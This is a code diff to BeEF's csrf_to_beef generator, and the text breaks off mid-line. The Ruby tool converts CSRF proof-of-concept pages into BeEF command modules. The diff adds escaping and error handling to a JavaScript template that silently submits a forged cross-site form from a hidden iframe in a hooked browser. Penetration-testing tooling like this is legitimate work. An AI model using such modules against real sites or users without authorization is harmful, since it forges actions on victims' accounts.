diff --git a/tools/csrf_to_beef/csrf_to_beef b/tools/csrf_to_beef/csrf_to_beef index b22b40d1a..dd16d44ef 100755 --- a/tools/csrf_to_beef/csrf_to_beef +++ b/tools/csrf_to_beef/csrf_to_beef @@ -5,14 +5,14 @@ # * support xhr # # * support multipart file upload # # * support CORS requests # -# * support character encoding # ################################################################################ $VERBOSE = false -$VERSION = '0.0.1' +$VERSION = '0.0.2' require 'uri' require 'getoptlong' require 'fileutils' +require 'htmlentities' # # @note Ruby version check @@ -145,7 +145,7 @@ class ModuleFile def generate class_name, target_url, options options_rb = "" options.to_enum.with_index(1).each do |input, input_index| - options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => '#{input[0]}', 'value' => '#{input[1]}' },\n" + options_rb += " { 'name' => 'input_#{input_index}', 'ui_label' => %q(#{input[0]}), 'value' => %q(#{input[1]}) },\n" end return <<-EOF # @@ -157,8 +157,8 @@ class #{class_name.capitalize} < BeEF::Core::Command def self.options return [ - { 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => '#{target_url}' }, -#{options_rb} + { 'name' => 'target_url', 'ui_label' => 'Target URL', 'value' => %q(#{target_url}) }, +#{options_rb.chomp} ] end @@ -178,7 +178,7 @@ class CommandFile def generate class_name, method, enctype, options options_js = "" options.to_enum.with_index(1).each do |input, input_index| - options_js += " {'type':'hidden', 'name':'#{input.first}', 'value':'<%= @input_#{input_index} %>' },\n" + options_js += " {'type':'hidden', 'name':'#{input.first.to_s.gsub(/'/, "\\'")}', 'value':'<%= CGI.escape(@input_#{input_index}) %>' },\n" end return <<-EOF // @@ -188,21 +188,33 @@ class CommandFile // beef.execute(function() { - var target_url = '<%= @target_url %>'; + var target_url = '<%= @target_url.to_s.gsub(/'/, "\\\\'") %>'; var timeout = 15; - var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, "#{method}", "#{enctype}", + exploit = function() { + var #{class_name}_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target_url, '#{method.to_s.gsub(/'/, "\\'")}', '#{enctype.to_s.gsub(/'/, "\\'")}', [ -#{options_js} +#{options_js.chomp} ]); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + } cleanup = function() { - document.body.removeChild(#{class_name}_iframe_<%= @command_id %>); + try { + document.body.removeChild(#{class_name}_iframe_<%= @command_id %>); + } catch(e) { + beef.debug("Could not remove iframe: " + e.message); + } } setTimeout("cleanup()", timeout*1000); + try { + exploit(); + } catch(e) { + beef.debug("Exploit failed: " + e.message); + } + }); EOF end @@ -226,7 +238,7 @@ def main fname, mname end # parse PoC file - if html.to_s =~ /var xhr = new XMLHttpRequest/ + if html.to_s =~ /var xhr = new XMLHttpRequest/ print_error "Could not parse PoC file - XMLHttpRequest is not yet supported." exit 1 elsif html.to_s !~ /